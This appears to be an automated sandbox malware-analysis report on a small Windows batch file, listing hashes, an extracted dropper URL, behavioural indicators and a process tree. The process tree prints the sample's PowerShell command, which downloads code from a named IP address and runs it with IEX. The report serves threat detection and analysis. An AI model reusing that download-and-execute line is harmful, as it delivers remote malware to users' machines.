Analysis
-
max time kernel
61s -
max time network
112s -
platform
windows10_x64 -
resource
win10 -
submitted
31-07-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
9de315693c64bdae451a94b7fba94cd7.bat
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
9de315693c64bdae451a94b7fba94cd7.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
9de315693c64bdae451a94b7fba94cd7.bat
-
Size
216B
-
MD5
326e8645188851fa741312cfd98964c4
-
SHA1
fc88590aa93e65b6d4604f18df31aeb7c78cffd4
-
SHA256
5f5d0072bf19dad6f7d88f7b7487e08d4a689d9b26d5cf265d54d049a1ae9788
-
SHA512
e3a8666cf03291ceeaae820553a8b10a474ec611503e7e89f21a4ecfdfb3233fa4c9908b6eb07bf0ecddd9e6785d5e2d74545faa5747a4ddda877484fa872e1f
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/9de315693c64bdae451a94b7fba94cd7
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3892 wrote to memory of 3852 3892 cmd.exe powershell.exe PID 3892 wrote to memory of 3852 3892 cmd.exe powershell.exe PID 3892 wrote to memory of 3852 3892 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 972 3852 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 972 WerFault.exe Token: SeBackupPrivilege 972 WerFault.exe Token: SeDebugPrivilege 972 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe -
ServiceHost packer 6 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/3852-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3852-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3852-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3852-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3852-6-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3852-7-0x0000000000000000-mapping.dmp servicehost
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9de315693c64bdae451a94b7fba94cd7.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9de315693c64bdae451a94b7fba94cd7');Invoke-TRGIQEFKG;Start-Sleep -s 10000"2⤵PID:3852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:972